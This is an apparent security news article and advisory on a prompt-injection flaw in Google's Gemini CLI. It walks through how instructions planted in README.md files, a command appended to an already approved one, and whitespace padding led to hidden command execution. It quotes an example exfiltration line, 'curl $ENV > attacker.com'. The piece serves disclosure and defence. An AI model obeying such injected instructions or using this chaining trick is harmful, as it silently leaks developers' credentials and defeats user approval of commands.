Tracebit

Analyzing the newly discovered Vulnerability in Gemini CLI; Impact on Software coding

Google’s Gemini command line interface (CLI) AI agent

Its not been one month when Google’s Gemini CLI vulnerability discovered by Tracebit researchers and found attackers could use prompt injection attacks to steal sensitive data.

Google’s Gemini CLI, an open-source AI agent for coding could allow attackers exploit to hide malicious commands, using “a toxic combination of improper validation, prompt injection and misleading UX,” as Tracebit explains.

After reports of the vulnerability surfaced, Google classified the situation as Priority 1 and Severity 1 on July 23, releasing the improved version two days later.

Those planning to use Gemini CLI should immediately upgrade to its latest version (0.1.14). Additionally, users could use the tool’s sandboxing mode for additional security and protection.

Disclosure of the vulnerability

Researchers reported on vulnerability directly to Google through its Bug Hunters programme. According to a timeline provided by Tracebit, the vulnerability was initially reported to Google’s Vulnerability Disclosure Programme (VDP) on 27 June, just two days after Gemini CLI’s public release.

Impact of the vulnerability

A detailed analysis found that in the patched version of Gemini CLI, attempts at code injection display the malicious command to users. This require explicit approval for any additional binaries to be executed. This change is intended to prevent the silent execution that the original vulnerability enabled.

Tracebit’s researchers played an important role in discovering and reporting the issue which is symbol of independent security research, particularly as AI-powered tools become central to software development workflows.

LLM integral to software development but hackers are using it too

Gemini CLI integrates Google’s LLM with traditional command line tools such as PowerShell or Bash. This allows developers to use natural language prompts to speed up tasks such as analyzing and debugging code, generating documentation, and understanding new repositories (“repos”).

As developers worldwide are using LLMs to help them develop code faster, attackers worldwide are using LLMs to help them understand and attack applications faster. 

Tracebit also discovered that malicious commands could easily be hidden in Gemini CLI This is possible by by packing the command line with blank characters, pushing the malicious commands out of the user’s sight.

More vigilance required when examining and running third-party or untrusted code, especially in tools leveraging AI to assist in software development.

Through the use of LLMs, AI excels at educating users, finding patterns and automate repetitive tasks.

Sam Cox, Tracebit’s founder, says he personally tested the exploit, which ultimately allowed him to execute any command — including destructive ones. “That’s exactly why I found this so concerning,” Cox told Ars Technica. “The same technique would work for deleting files, a fork bomb or even installing a remote shell giving the attacker remote control of the user’s machine.”

Source: https://in.mashable.com/tech/97813/if-youre-coding-with-gemini-cli-you-need-this-security-update

Gemini CLI Vulnerability Enables Silent Execution of Malicious Commands on Developer Systems 

Summary 

Security Advisory :

In July 2025, a critical security vulnerability was discovered in Google’s Gemini CLI, a command-line tool used by developers to interact with Gemini AI. The flaw allowed attackers to execute hidden, malicious commands without user consent by exploiting prompt injection, poor command validation and an ambiguous trust interface. 

This issue was responsibly reported and addressed with the release of Gemini CLI version 0.1.14. The incident highlights the growing need for secure integration of AI tools in software development workflows. 

Vulnerability Details 

Security researchers identified that Gemini CLI reads project context files—such as README.md—to understand the codebase. Attackers can embed malicious commands into these files using indirect prompt injection techniques. These injected payloads are often disguised within legitimate content (e.g. license text, markdown formatting) to avoid detection. 

A core issue lies in Gemini’s handling of command approvals. Gemini CLI remembers previously approved commands (e.g. grep) to avoid prompting the user repeatedly. Attackers exploited this by appending malicious commands (e.g. curl $ENV > attacker.com) to a trusted one. Since the first part is familiar, the entire command string is executed without further validation. 

To increase stealth, malicious commands are hidden using whitespace padding or formatting tricks to avoid visual detection in the terminal or logs. Researchers demonstrated this attack by cloning a poisoned public GitHub repository, which resulted in unauthorized exfiltration of credentials during Gemini CLI analysis.Initially labeled as a low-severity issue, Google elevated its classification to a high-priority vulnerability and released a fix in version 0.1.14, which now enforces stricter visibility and re-approval of commands. 

Note: By default, Gemini CLI does not enable sandboxing, so manual configuration is required to isolate execution environments from the host system. 

Attack Flow 

Step Description 
1. Craft Malicious prompt injections are embedded inside context files like README.md along with benign code. 
2. Deliver Malicious repository is cloned or reviewed by a developer using Gemini CLI. 
3. Trigger Gemini CLI loads and interprets the context files. 
4. Execution Malicious code is executed due to weak validation and implicit trust. 
5. Exfiltrate Environment variables or secrets are silently sent to attacker-controlled servers. 

Proof-of-Concept Snippet 

Source: Tracebit 

Why It’s Effective 

  • Indirect Prompt Injection: Inserts malicious instructions within legitimate files rather than in direct input, bypassing typical user scrutiny. 
  • Command Whitelist Bypass: Weak command validation allows malicious extensions of approved commands. 
  • Visual Stealth: Large whitespace and terminal output manipulation hide malicious commands from users & security Tools. 

Broader Implications 

Gemini CLI are powerful for developers, helping to automate tasks and understand code faster. But this also comes with vulnerabilities especially when these tools can run commands and interact with untrusted code. This recent example shows how important it is to stay secure when using AI assistants to analyze unknown repositories. For teams working with open-source projects or unfamiliar codebases, it’s important to have safety checks in place. This highlights the growing need for smarter, more secure AI-driven tools that support developers without putting systems at risk. 

Remediation

  • Upgrade Gemini CLI to version 0.1.14 or later. 
  • Enable sandboxing modes where it is possible to isolate and protect systems. 
  • Avoid running Gemini CLI against untrusted or unknown codebases without appropriate safeguards. 
  • Review and monitor command execution prompts carefully 

Conclusion: 
The Gemini CLI vulnerability underscores how prompt injection and command trust mechanisms can silently expose systems to attack when using AI tools. As these assistants become more deeply integrated into development workflows, it’s vital to adopt a “trust, but verify” approach treating AI-generated or assisted actions with the same caution as externally sourced code. 

Security, visibility and isolation should be core pillars in any team’s approach to adopting AI in DevOps and engineering pipelines. 

References

Scroll to top